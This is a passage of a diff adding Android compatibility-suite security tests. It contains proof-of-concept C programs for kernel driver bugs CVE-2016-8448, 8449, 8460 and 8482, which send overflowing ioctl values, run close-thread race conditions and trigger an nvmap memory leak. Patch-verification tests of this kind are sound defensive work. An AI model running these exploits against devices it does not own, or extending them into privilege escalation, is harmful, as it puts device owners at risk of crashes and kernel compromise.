+ struct ion_handle *ion_handles[4];
+ void *dev;
+} update_ovls_work_t;
+
+struct mtkfb_device {
+ int state;
+ void *fb_va_base; /* MPU virtual address */
+ dma_addr_t fb_pa_base; /* Bus physical address */
+ unsigned long fb_size_in_byte;
+ void *ovl_va_base; /* MPU virtual address */
+ dma_addr_t ovl_pa_base; /* Bus physical address */
+ unsigned long ovl_size_in_byte;
+
+ unsigned long layer_enable;
+ MTK_FB_FORMAT *layer_format;
+ unsigned int layer_config_dirty;
+
+ int xscale, yscale, mirror; /* transformations.
+ rotate is stored in fb_info->var */
+ u32 pseudo_palette[17];
+
+ struct fb_info *fb_info; /* Linux fbdev framework data */
+ struct device *dev;
+
+ /* Android native fence support */
+ struct workqueue_struct *update_ovls_wq;
+ struct mutex timeline_lock;
+ struct sw_sync_timeline *timeline;
+ int timeline_max;
+ struct list_head pending_configs; /* CL2340210 */
+ struct ion_client *ion_client;
+};
+
+#endif /* __KERNEL__ */
+
+extern long hdmi_handle_cmd(unsigned int cmd, unsigned long arg);
+
+#if defined(CONFIG_ARCH_MT6797)
+extern unsigned int vramsize;
+#endif
+
+#if defined(CONFIG_ARCH_MT6735) || defined(CONFIG_ARCH_MT6735M) || defined(CONFIG_ARCH_MT6753)
+extern bool is_early_suspended;
+extern void mtkfb_waitVsync(void);
+extern bool is_ipoh_bootup;
+
+#ifdef CONFIG_OF
+int _parse_tag_videolfb(void);
+extern unsigned int islcmconnected;
+extern unsigned int vramsize;
+#else
+extern char *saved_command_line;
+#endif
+#endif /* CONFIG_ARCH_MT6735 */
+
+
+#endif /* __MTKFB_H */
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb_info.h b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb_info.h
new file mode 100644
index 0000000..61e7cfd
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb_info.h
@@ -0,0 +1,101 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __MTKFB_INFO_H__
+#define __MTKFB_INFO_H__
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+
+ typedef enum {
+ DISPIF_TYPE_DBI = 0,
+ DISPIF_TYPE_DPI,
+ DISPIF_TYPE_DSI,
+ DISPIF_TYPE_DPI0,
+ DISPIF_TYPE_DPI1,
+ DISPIF_TYPE_DSI0,
+ DISPIF_TYPE_DSI1,
+ HDMI = 7,
+ HDMI_SMARTBOOK,
+ MHL,
+ DISPIF_TYPE_EPD,
+ SLIMPORT
+ } MTKFB_DISPIF_TYPE;
+
+ typedef enum {
+ MTKFB_DISPIF_PRIMARY_LCD = 0,
+ MTKFB_DISPIF_HDMI,
+ MTKFB_DISPIF_EPD,
+ MTKFB_MAX_DISPLAY_COUNT
+ } MTKFB_DISPIF_DEVICE_TYPE;
+
+ typedef enum {
+ DISPIF_FORMAT_RGB565 = 0,
+ DISPIF_FORMAT_RGB666,
+ DISPIF_FORMAT_RGB888
+ } MTKFB_DISPIF_FORMAT;
+
+
+ typedef enum {
+ DISPIF_MODE_VIDEO = 0,
+ DISPIF_MODE_COMMAND
+ } MTKFB_DISPIF_MODE;
+
+ typedef struct mtk_dispif_info {
+ unsigned int display_id;
+ unsigned int isHwVsyncAvailable;
+ MTKFB_DISPIF_TYPE displayType;
+ unsigned int displayWidth;
+ unsigned int displayHeight;
+ unsigned int displayFormat;
+ MTKFB_DISPIF_MODE displayMode;
+ unsigned int vsyncFPS;
+ unsigned int physicalWidth;
+ unsigned int physicalHeight;
+ unsigned int isConnected;
+/* this value is for DFO Multi-Resolution feature, which stores the original LCM Wdith */
+ unsigned int lcmOriginalWidth;
+/* this value is for DFO Multi-Resolution feature, which stores the original LCM Height */
+ unsigned int lcmOriginalHeight;
+ } mtk_dispif_info_t;
+
+#define MAKE_MTK_FB_FORMAT_ID(id, bpp) (((id) << 8) | (bpp))
+
+ typedef enum {
+ MTK_FB_FORMAT_UNKNOWN = 0,
+
+ MTK_FB_FORMAT_RGB565 = MAKE_MTK_FB_FORMAT_ID(1, 2),
+ MTK_FB_FORMAT_RGB888 = MAKE_MTK_FB_FORMAT_ID(2, 3),
+ MTK_FB_FORMAT_BGR888 = MAKE_MTK_FB_FORMAT_ID(3, 3),
+ MTK_FB_FORMAT_ARGB8888 = MAKE_MTK_FB_FORMAT_ID(4, 4),
+ MTK_FB_FORMAT_ABGR8888 = MAKE_MTK_FB_FORMAT_ID(5, 4),
+ MTK_FB_FORMAT_YUV422 = MAKE_MTK_FB_FORMAT_ID(6, 2),
+ MTK_FB_FORMAT_XRGB8888 = MAKE_MTK_FB_FORMAT_ID(7, 4),
+ MTK_FB_FORMAT_XBGR8888 = MAKE_MTK_FB_FORMAT_ID(8, 4),
+ MTK_FB_FORMAT_UYVY = MAKE_MTK_FB_FORMAT_ID(9, 2),
+ MTK_FB_FORMAT_YUV420_P = MAKE_MTK_FB_FORMAT_ID(10, 2),
+ MTK_FB_FORMAT_YUY2 = MAKE_MTK_FB_FORMAT_ID(11, 2),
+ MTK_FB_FORMAT_BPP_MASK = 0xFF,
+ } MTK_FB_FORMAT;
+
+#define GET_MTK_FB_FORMAT_BPP(f) ((f) & MTK_FB_FORMAT_BPP_MASK)
+
+
+#ifdef __cplusplus
+}
+#endif
+#endif /* __DISP_DRV_H__ */
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8448/poc.c
new file mode 100644
index 0000000..e5f675b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/poc.c
@@ -0,0 +1,59 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <sys/mman.h>
+#include <fcntl.h>
+//#include <pthread.h>
+#include <sys/prctl.h>
+#include <unistd.h>
+#include <stdbool.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <asm-generic/ioctl.h>
+#include "mtkfb.h"
+int main(int argc, char **argv) {
+ int fd = 0;
+ struct fb_overlay_layer layerInfo;
+ memset(&layerInfo, 0, sizeof(layerInfo));
+ fd = open("/dev/graphics/fb0", O_RDWR);
+ if (fd < 0) {
+ perror("open /dev/graphics/fb0");
+ exit(-1);
+ }
+ printf("Device file opened successfully\n");
+ printf("Trying to get layer info\n");
+ if(ioctl(fd, MTKFB_GET_OVERLAY_LAYER_INFO, &layerInfo) == -1) {
+ perror("ioctl MTKFB_GET_OVERLAY_LAYER_INFO failed");
+ exit(-2);
+ }
+ printf("Got layer info\n");
+ printf("Trying to set layer info\n");
+ // set any huge value here
+ int curr_val = 0xf1111111;
+ while(1) {
+ layerInfo.layer_id = curr_val;
+ if(ioctl(fd, MTKFB_SET_OVERLAY_LAYER, &layerInfo) == -1) {
+ perror("ioctl MTKFB_SET_OVERLAY_LAYER failed");
+ //exit(-2);
+ }
+ curr_val--;
+ if(curr_val == -1) {
+ break;
+ }
+ }
+ printf("Set layer info\n");
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8449/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8449/Android.mk
new file mode 100644
index 0000000..ce1e1bb
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8449/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8449
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8449/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8449/poc.c
new file mode 100755
index 0000000..1e76b55
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8449/poc.c
@@ -0,0 +1,143 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <string.h>
+#include <errno.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+#define CLOSE_THREAD_NUM 100
+#define TRY_TIMES 900
+
+#define DEV "/dev/tegra_avpchannel"
+
+#define NVAVP_IOCTL_MAGIC 'n'
+
+struct nvavp_channel_open_args {
+ __u32 channel_fd;
+};
+
+#define NVAVP_IOCTL_CHANNEL_OPEN _IOR(NVAVP_IOCTL_MAGIC, 0x73, \
+ struct nvavp_channel_open_args)
+
+int fd;
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ ERR("[-] set affinity failed");
+ }
+ return ret;
+}
+
+volatile int target_fd;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(attack){
+ close(target_fd);
+ }
+
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+ struct nvavp_channel_open_args o_args = { 0 };
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV, O_RDONLY);
+ if(fd == -1){
+ ERR("[-] open failed");
+ return 0;
+ } else {
+ LOG("[+] open OK");
+ }
+
+ #if 1
+ ret = ioctl(fd, NVAVP_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ goto out_dev;
+ } else {
+ LOG("[+] ioctl OK, fd = %d", o_args.channel_fd);
+ }
+
+ target_fd = o_args.channel_fd;
+ #endif
+
+ /* create close thread */
+ #if 1
+ attack = 1;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+ if(ret){
+ ERR("[-] create close thread %d failed", i);
+ goto out_close_thread;
+ }
+ }
+ #endif
+
+ #if 1
+ for(i = 0; i < TRY_TIMES; i++){
+ LOG("[+] %03d times", i);
+ /* open */
+ ret = ioctl(fd, NVAVP_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ } else {
+ LOG("[+] ioctl OK, fd = %d", o_args.channel_fd);
+ }
+ //usleep(200);
+ }
+ #endif
+
+out_close_thread:
+ attack = 0;
+ /* kill close thread */
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ if(close_thread_id[i])
+ pthread_join(close_thread_id[i], NULL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8460/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8460/Android.mk
new file mode 100644
index 0000000..b9c51d1
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8460/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8460
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS := -Wall -W -g -O2 -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8460/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8460/poc.c
new file mode 100755
index 0000000..78d41e5
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8460/poc.c
@@ -0,0 +1,165 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <errno.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+
+struct nvmap_handle_param {
+ __u32 handle; /* nvmap handle */
+ __u32 param; /* size/align/base/heap etc. */
+ unsigned long result; /* returns requested info*/
+};
+
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+
+struct nvmap_pin_handle {
+ __u32 *handles; /* array of handles to pin/unpin */
+ unsigned long *addr; /* array of addresses to return */
+ __u32 count; /* number of entries in handles */
+};
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+
+struct nvmap_pin_handle_32 {
+ __u32 handles; /* array of handles to pin/unpin */
+ __u32 addr; /* array of addresses to return */
+ __u32 count; /* number of entries in handles */
+};
+
+struct nvmap_map_caller_32 {
+ __u32 handle; /* nvmap handle */
+ __u32 offset; /* offset into hmem; should be page-aligned */
+ __u32 length; /* number of bytes to map */
+ __u32 flags; /* maps as wb/iwb etc. */
+ __u32 addr; /* user pointer*/
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PIN_MULT _IOWR(NVMAP_IOC_MAGIC, 10, struct nvmap_pin_handle)
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_PIN_MULT_32 _IOWR(NVMAP_IOC_MAGIC, 10, struct nvmap_pin_handle_32)
+#define NVMAP_IOC_MMAP_32 _IOWR(NVMAP_IOC_MAGIC, 5, struct nvmap_map_caller_32)
+
+/* common carveout heaps */
+#define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
+
+
+int g_fd = -1;
+
+int open_driver() {
+ char* dev_path = "/dev/nvmap";
+ g_fd = open(dev_path, O_RDWR);
+ return g_fd;
+}
+
+
+int main(int argc, char**argv) {
+ if (open_driver() < 0) {
+ return -1;
+ }
+
+ int i;
+ int* handles = mmap((void*)0x20000000, 0x1000, PROT_READ | PROT_WRITE , MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+ memset(handles, 0x42, 0x1000);
+ for (i = 0; i < 2; ++i) {
+ struct nvmap_create_handle op = {0};
+ op.size = 0x1000;
+ ioctl(g_fd, NVMAP_IOC_CREATE, &op);
+ handles[i] = op.handle;
+ struct nvmap_alloc_handle alloc = {0};
+ alloc.align = 0x1000;
+ alloc.handle = op.handle;
+ alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+ alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+ ioctl(g_fd, NVMAP_IOC_ALLOC, &alloc);
+ }
+
+ void* leak_addr = (void*) 0x10001000;
+ void* mmap_addr = mmap(leak_addr, 0x1000, PROT_READ | PROT_WRITE , MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+ memset(leak_addr, 0x41, 0x1000);
+
+ unsigned long leaked_data = 0;
+ struct nvmap_pin_handle_32 pin = {0};
+ pin.count = 2;
+ pin.handles = (unsigned int) handles;
+ struct nvmap_pin_handle err_pin = {0};
+ err_pin.count = 0;
+ err_pin.handles = handles;
+ err_pin.addr = leak_addr + 8;
+
+ ioctl(g_fd, NVMAP_IOC_PIN_MULT, &err_pin); // construct op.addr
+ ioctl(g_fd, NVMAP_IOC_PIN_MULT_32, &pin);
+
+ for (i = 0; i < 10; ++i) {
+ if(((int*)leak_addr)[i] != 0x41414141 && 0 == leaked_data) {
+ leaked_data = (unsigned long)((int*)leak_addr) + i;
+ }
+ }
+
+ if (leaked_data) {
+ printf("Vulnerable");
+ }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8482/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8482/Android.mk
new file mode 100644
index 0000000..b41fb16
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8482/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8482
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8482/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8482/poc.c
new file mode 100644
index 0000000..41862a5
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8482/poc.c
@@ -0,0 +1,205 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+// for syscall
+#include <sys/syscall.h>
+// for futex
+#include <linux/futex.h>
+#include <sys/time.h>
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt ": %d(%d)\n", ##__VA_ARGS__, errno, errno)
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+
+#define NVMAP_IOC_MAGIC 'N'
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+
+#define NVHOST_IOCTL_MAGIC 'H'
+struct nvhost_set_error_notifier {
+ __u64 offset;
+ __u64 size;
+ __u32 mem;
+ __u32 padding;
+};
+#define NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER \
+ _IOWR(NVHOST_IOCTL_MAGIC, 111, struct nvhost_set_error_notifier)
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ printf("[-] set affinity failed: [%d]-%d\n", errno, errno);
+ }
+ return ret;
+}
+
+struct nvhost_submit_args {
+ __u32 submit_version;
+ __u32 num_syncpt_incrs;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 timeout;
+ __u32 flags;
+ __u32 fence; /* Return value */
+ __u64 syncpt_incrs;
+ __u64 cmdbuf_exts;
+
+ __u64 pad[3]; /* future expansion */
+
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 reloc_shifts;
+ __u64 waitchks;
+ __u64 waitbases;
+ __u64 class_ids;
+ __u64 fences;
+};
+#define NVHOST_IOCTL_CHANNEL_SUBMIT \
+ _IOWR(NVHOST_IOCTL_MAGIC, 26, struct nvhost_submit_args)
+
+struct nvhost_syncpt_incr {
+ __u32 syncpt_id;
+ __u32 syncpt_incrs;
+};
+
+#define CLOSE_THREAD_NUM 1
+#define TRY_TIMES 2
+#define NVMAPDEV "/dev/nvmap"
+#define VICDEV "/dev/nvhost-vic"
+#define SYNC_NUM 1
+struct nvhost_set_error_notifier err1 = { 0 }, err2 = { 0 };
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+int nvmap, vic;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+ int ret;
+ set_affinity(1);
+
+ while(attack){
+ ret = ioctl(vic, NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER, &err1);
+ }
+
+ return NULL;
+}
+
+int main()
+{
+ int i, j, ret;
+ int dma1, dma2;
+ struct nvmap_create_handle args = {
+ .size = PAGE_SIZE
+ };
+ struct nvmap_alloc_handle alloc = {
+ .heap_mask = 0xFFFFFFFF
+ };
+
+ struct nvhost_syncpt_incr incr[SYNC_NUM];
+
+ struct nvhost_submit_args submit = {
+ .num_syncpt_incrs = SYNC_NUM,
+ .syncpt_incrs = (intptr_t)incr,
+ .timeout = 1,
+ //.class_ids = (intptr_t)&ret
+ };
+
+ memset(incr, 0, sizeof(incr));
+ incr[0].syncpt_id = 6;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ nvmap = open(NVMAPDEV, O_RDONLY);
+ if(nvmap == -1)
+ ERR("[-] open %s failed", NVMAPDEV);
+ else
+ LOG("[+] open %s OK", NVMAPDEV);
+
+ vic = open(VICDEV, O_RDONLY);
+ if(vic == -1)
+ ERR("[-] open %s failed", VICDEV);
+ else
+ LOG("[+] open %s OK", VICDEV);
+
+ // prepare
+ ret = ioctl(nvmap, NVMAP_IOC_CREATE, &args);
+ if(ret)
+ ERR("[-] ioctl NVMAP_IOC_CREATE failed");
+ else
+ LOG("[+] NVMAP_IOC_CREATE succeeded, fd = %d", args.handle);
+
+ dma1 = args.handle;
+ err1.mem = dma1;
+ alloc.handle = dma1;
+
+ ret = ioctl(nvmap, NVMAP_IOC_ALLOC, &alloc);
+ if(ret)
+ ERR("[-] ioctl NVMAP_IOC_ALLOC failed");
+ else
+ LOG("[+] NVMAP_IOC_ALLOC succeeded");
+
+ /* create close thread */
+ attack = 1;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+ }
+ LOG("[+] running...");
+ while(1) {
+ ret = ioctl(vic, NVHOST_IOCTL_CHANNEL_SUBMIT, &submit);
+ }
+
+ LOG("[-] passed :(");
+ attack = 0;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++) {
+ pthread_join(close_thread_id[i], NULL);
+ }
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-9120/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-9120/Android.mk
new file mode 100644
index 0000000..95ddb3d
--- /dev/null
